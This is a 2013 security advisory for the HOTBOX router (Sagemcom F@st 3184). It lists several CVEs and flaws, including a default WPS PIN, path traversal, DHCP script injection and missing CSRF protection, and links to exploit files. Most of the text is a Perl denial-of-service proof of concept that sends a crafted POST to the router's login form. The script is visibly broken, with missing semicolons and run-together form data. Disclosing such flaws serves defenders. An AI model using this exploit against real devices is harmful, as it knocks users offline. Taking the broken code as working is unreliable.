+------------------------------------------------------------------------------+
| HOTBOX is the leading router/modem appliance of |
| HOT Cable communication company in israel. |
| The Appliance is manufactured by SAGEMCOM |
| and carries the model name F@st 3184. |
+------------------------------------------------------------------------------+
| Title: HOTBOX Multiple Vulnerabilities |
+--------------------+---------------------------------------------------------+
| Release Date | 2013/09/09 |
| Researcher | Oz Elisyan |
+--------------------+---------------------------------------------------------+
| System Affected | HOTBOX Router/Modem |
| Versions Affected | 2.1.11 , possibly earlier |
| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|
| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |
| CVE-2013-5039 |
| Vendor Patched | N/A |
| Classification | 0-day |
| Exploits | http://elisyan.com/hotboxDoS.pl, |
| http://elisyan.com/hotboxCSRF.html |
+--------------------+---------------------------------------------------------+
Vulnerabilities List -
# Default WPS Pin
# Authentication based on IP Address
# DoS via crafted POST
# Path/Directory Traversal
# Script injection via DHCP request
# No CSRF Token
use warnings;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
# Author: Oz Elisyan
# Date: 3 September 2013
# Affected Version: <= 2.1.11
print "# HOTBOX DoS PoC #\n\n"
unless ($ARGV[0]){
print "Please Enter Valid Host Name.\n";
exit();
}
print "Sending Evil POST request...\n";
my $HOST = $ARGV[0];
my $URL = "http://$HOST/goform/login";
my $PostData = "loginUsername=aaaloginPassword=aaa"
my $browser = LWP::UserAgent->new();
my $req = HTTP::Request->new(POST => $URL);
$req->content_type("application/x-www-form-urlencoded");
$req->content($PostData);
my $resp = $browser->request($req);